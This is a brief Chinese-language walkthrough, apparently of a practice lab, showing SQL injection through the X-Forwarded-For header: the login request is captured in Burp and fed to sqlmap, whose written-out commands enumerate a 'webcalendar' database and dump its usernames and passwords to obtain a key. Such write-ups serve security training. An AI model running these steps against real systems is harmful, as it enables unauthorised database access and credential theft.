X-Forwarded-For注入漏洞实战

浏览器设置代理,burp截断登陆请求的数据包

send to repeater,然后增加一行X-Forwarded-For:*,下一行留空

Go 保存response,改成txt文件

打开sqlmap,依次查出数据库、查询表名、查询列中的字段,如sqlmap -r txt文件路径 --dbs --batch(–batch 批处理,在检测过程中会问用户一些问题,使用这个参数统统使用默认值。)
sqlmap -r /opt/abc.txt -D webcalendar --tables --batch
sqlmap -r /opt/abc.txt -D webcalendar -T user --columns --batch
sqlmap -r /opt/abc.txt -D webcalendar -T user -C username,password --dump --batch

获得用户名密码,输入得到key X-Forwarded-For注入漏洞实战_第1张图片

你可能感兴趣的:(X-Forwarded-For注入漏洞实战)